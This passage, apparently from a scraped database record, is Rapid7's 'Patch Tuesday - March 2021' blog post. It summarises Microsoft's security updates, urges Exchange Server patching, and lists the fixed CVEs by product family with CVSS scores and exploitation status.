as more than half of them have been seen exploited in the wild.\n\n### Vulnerability Breakdown by Software Family\n\nFamily | Vulnerability Count \n---|--- \nWindows | 59 \nBrowser | 35 \nESU | 24 \nMicrosoft Office | 11 \nExchange Server | 7 \nDeveloper Tools | 6 \nAzure | 3 \nSQL Server | 1 \n \n## [Exchange Server Vulnerabilities](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>)\n\nEarlier this month Microsoft [released out of band updates for Exchange Server](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>). These critical updates fixed a number of publicly exploited vulnerabilities, but not before attackers were able to compromise over 30,000 internet facing instances. \n\nYesterday, Microsoft issued an [additional set of patches](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) for older, unsupported versions of Exchange Server. This allows customers who have not been able to update to the most recent version of Exchange the ability to defend against these widespread exploit attempts.\n\nIf you administer an Exchange Server,** stop reading this blog and go patch these systems!** For more information [please see our blog post on the topic](<https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>).\n\n## Patch those Windows systems!\n\nAlmost half of the newly announced vulnerabilities this month affect components of Windows itself. Some major highlights include:\n\n * Multiple high severity RCE vulnerabilities in Windows DNS Server \n([CVE-2021-26877](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26877>), [CVE-2021-26893](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26893>), [CVE-2021-26894](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26894>), [CVE-2021-26895](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26895>), and [CVE-2021-26897](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26897>))\n * Remote Code Execution in Hyper-V ([CVE-2021-26867](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26867>)) enabling virtual machine escape (CVSSv3 9.9)\n\n## Browser Vulnerabilities\n\nSince going end-of-life in November 2020, we haven't seen any Internet Explorer patches from Microsoft. However, this month Microsoft has made two new updates available: [CVE-2021-27085](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27085>) and [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26411>). CVE-2021-26411 has been exploited in the wild, so don't delay applying patches if IE is still in your environment.\n\nThe majority of the browser vulnerabilities announced this month affect Microsoft Edge on Chromium. These patches are courtesy of vulnerabilities being fixed upstream in the Chromium project.\n\n## Summary Tables\n\nHere are this month's patched vulnerabilities split by the product family.\n\n## Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27075](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27075>) | Azure Virtual Machine Information Disclosure Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-27080](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27080>) | Azure Sphere Unsigned Code Execution Vulnerability | No | No | 9.3 | Yes \n[CVE-2021-27074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27074>) | Azure Sphere Unsigned Code Execution Vulnerability | No | No | 6.2 | Yes \n \n## Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27085](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27085>) | Internet Explorer Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-21190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21190>) | Chromium CVE-2021-21190 : Uninitialized Use in PDFium | No | No | N/A | Yes \n[CVE-2021-21189](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21189>) | Chromium CVE-2021-21189: Insufficient policy enforcement in payments | No | No | N/A | Yes \n[CVE-2021-21188](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21188>) | Chromium CVE-2021-21188: Use after free in Blink | No | No | N/A | Yes \n[CVE-2021-21187](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21187>) | Chromium CVE-2021-21187: Insufficient data validation in URL formatting | No | No | N/A | Yes \n[CVE-2021-21186](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21186>) | Chromium CVE-2021-21186: Insufficient policy enforcement in QR scanning | No | No | N/A | Yes \n[CVE-2021-21185](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21185>) | Chromium CVE-2021-21185: Insufficient policy enforcement in extensions | No | No | N/A | Yes \n[CVE-2021-21184](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21184>) | Chromium CVE-2021-21184: Inappropriate implementation in performance APIs | No | No | N/A | Yes \n[CVE-2021-21183](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21183>) | Chromium CVE-2021-21183: Inappropriate implementation in performance APIs | No | No | N/A | Yes \n[CVE-2021-21182](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21182>) | Chromium CVE-2021-21182: Insufficient policy enforcement in navigations | No | No | N/A | Yes \n[CVE-2021-21181](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21181>) | Chromium CVE-2021-21181: Side-channel information leakage in autofill | No | No | N/A | Yes \n[CVE-2021-21180](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21180>) | Chromium CVE-2021-21180: Use after free in tab search | No | No | N/A | Yes \n[CVE-2021-21179](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21179>) | Chromium CVE-2021-21179: Use after free in Network Internals | No | No | N/A | Yes \n[CVE-2021-21178](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21178>) | Chromium CVE-2021-21178 : Inappropriate implementation in Compositing | No | No | N/A | Yes \n[CVE-2021-21177](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21177>) | Chromium CVE-2021-21177: Insufficient policy enforcement in Autofill | No | No | N/A | Yes \n[CVE-2021-21176](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21176>) | Chromium CVE-2021-21176: Inappropriate implementation in full screen mode | No | No | N/A | Yes \n[CVE-2021-21175](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21175>) | Chromium CVE-2021-21175: Inappropriate implementation in Site isolation | No | No | N/A | Yes \n[CVE-2021-21174](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21174>) | Chromium CVE-2021-21174: Inappropriate implementation in Referrer | No | No | N/A | Yes \n[CVE-2021-21173](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21173>) | Chromium CVE-2021-21173: Side-channel information leakage in Network Internals | No | No | N/A | Yes \n[CVE-2021-21172](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21172>) | Chromium CVE-2021-21172: Insufficient policy enforcement in File System API | No | No | N/A | Yes \n[CVE-2021-21171](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21171>) | Chromium CVE-2021-21171: Incorrect security UI in TabStrip and Navigation | No | No | N/A | Yes \n[CVE-2021-21170](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21170>) | Chromium CVE-2021-21170: Incorrect security UI in Loader | No | No | N/A | Yes \n[CVE-2021-21169](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21169>) | Chromium CVE-2021-21169: Out of bounds memory access in V8 | No | No | N/A | Yes \n[CVE-2021-21168](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21168>) | Chromium CVE-2021-21168: Insufficient policy enforcement in appcache | No | No | N/A | Yes \n[CVE-2021-21167](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21167>) | Chromium CVE-2021-21167: Use after free in bookmarks | No | No | N/A | Yes \n[CVE-2021-21166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21166>) | Chromium CVE-2021-21166: Object lifecycle issue in audio | No | No | N/A | Yes \n[CVE-2021-21165](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21165>) | Chromium CVE-2021-21165: Object lifecycle issue in audio | No | No | N/A | Yes \n[CVE-2021-21164](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21164>) | Chromium CVE-2021-21164: Insufficient data validation in Chrome for iOS | No | No | N/A | Yes \n[CVE-2021-21163](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21163>) | Chromium CVE-2021-21163: Insufficient data validation in Reader Mode | No | No | N/A | Yes \n[CVE-2021-21162](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21162>) | Chromium CVE-2021-21162: Use after free in WebRTC | No | No | N/A | Yes \n[CVE-2021-21161](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21161>) | Chromium CVE-2021-21161: Heap buffer overflow in TabStrip | No | No | N/A | Yes \n[CVE-2021-21160](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21160>) | Chromium CVE-2021-21160: Heap buffer overflow in WebAudio | No | No | N/A | Yes \n[CVE-2021-21159](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21159>) | Chromium CVE-2021-21159: Heap buffer overflow in TabStrip | No | No | N/A | Yes \n[CVE-2020-27844](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-27844>) | Chromium CVE-2020-27844: Heap buffer overflow in OpenJPEG | No | No | N/A | Yes \n \n## Browser ESU Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26411>) | Internet Explorer Memory Corruption Vulnerability | Yes | Yes | 8.8 | Yes \n \n## Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27060](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27060>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27084](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27084>) | Visual Studio Code Java Extension Pack Remote Code Execution Vulnerability | No | No | N/A | No \n[CVE-2021-27081](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27081>) | Visual Studio Code ESLint Extension Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27083](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27083>) | Remote Development Extension for Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27082](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27082>) | Quantum Development Kit for Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-21300](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21300>) | Git for Visual Studio Remote Code Execution Vulnerability | No | No | 8.8 | No \n \n## Exchange Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26412](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26412>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9.1 | No \n[CVE-2021-26855](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 9.1 | Yes \n[CVE-2021-27078](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27078>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9.1 | No \n[CVE-2021-26857](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-27065](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27065>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-26858](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-26854](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26854>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 6.6 | No \n \n## Microsoft Office Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27055](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27055>) | Microsoft Visio Security Feature Bypass Vulnerability | No | No | 7 | Yes \n[CVE-2021-24104](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24104>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 4.6 | Yes \n[CVE-2021-27076](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27076>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-27052](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27052>) | Microsoft SharePoint Server Information Disclosure Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-27056](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27056>) | Microsoft PowerPoint Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24108](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24108>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27057](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27057>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27059](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27059>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.6 | Yes \n[CVE-2021-27058](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27058>) | Microsoft Office ClickToRun Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27053](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27053>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27054](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27054>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## SQL Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26859](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26859>) | Microsoft Power BI Information Disclosure Vulnerability | No | No | 7.7 | Yes \n \n## Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26900](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26900>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26863](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26863>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-26871](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26871>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26885](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26885>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26864](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26864>) | Windows Virtual Registry Provider Elevation of Privilege Vulnerability | No | No | 8.4 | No \n[CVE-2021-1729](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1729>) | Windows Update Stack Setup Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26889](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26889>) | Windows Update Stack Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26866](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26866>) | Windows Update Service Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26870](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26870>) | Windows Projected File System Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26874](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26874>) | Windows Overlay Filter Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26879](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26879>) | Windows NAT Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-26884](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26884>) | Windows Media Photo Codec Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-26867](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26867>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 9.9 | Yes \n[CVE-2021-26868](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26868>) | Windows Graphics Component Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26892](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26892>) | Windows Extensible Firmware Interface Security Feature Bypass Vulnerability | No | No | 6.2 | No \n[CVE-2021-24090](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24090>) | Windows Error Reporting Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26865](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26865>) | Windows Container Execution Agent Elevation of Privilege Vulnerability | No | No | 8.8 | No \n[CVE-2021-26891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26891>) | Windows Container Execution Agent Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26860](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26860>) | Windows App-V Overlay Filter Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-27066](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27066>) | Windows Admin Center Security Feature Bypass Vulnerability | No | No | 4.3 | No \n[CVE-2021-27070](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27070>) | Windows 10 Update Assistant Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-26886](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26886>) | User Profile Service Denial of Service Vulnerability | No | No | 5.5 | No \n[CVE-2021-26880](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26880>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26876](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26876>) | OpenType Font Parsing Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-24089](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24089>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-26902](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26902>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27061](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27061>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24110](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24110>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27047](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27047>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27048](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27048>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27049](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27049>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27050](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27050>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27051](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27051>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27062](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27062>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24095](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24095>) | DirectX Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-26890](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26890>) | Application Virtualization Remote Code Execution Vulnerability | No | No | 7.8 | No \n \n## Windows ESU Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27077>) | Windows Win32k Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-26875](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26875>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26873](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26873>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-26899](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26899>) | Windows UPnP Device Host Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1640](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1640>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-26878](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26878>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26862](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26862>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 6.3 | No \n[CVE-2021-26861](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26861>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-24107](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24107>) | Windows Event Tracing Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-26872](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26872>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26898>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26901](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26901>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26897](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26897>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26877](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26877>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26893](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26893>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26894](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26894>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26895](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26895>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26896](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26896>) | Windows DNS Server Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-27063](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27063>) | Windows DNS Server Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-26869](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26869>) | Windows ActiveX Installer Service Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-26882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26882>) | Remote Access API Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26881](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26881>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.5 | No \n[CVE-2021-26887](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26887>) | Microsoft Windows Folder Redirection Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n## Summary Graphs\n\n", "modified": "2021-03-09T22:13:03", "published": "2021-03-09T22:13:03", "id": "RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53", "href": "https://blog.rapid7.com/2021/03/09/patch-tuesday-march-2021/", "type": "rapid7blog", "title": "Patch Tuesday - March 2021", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
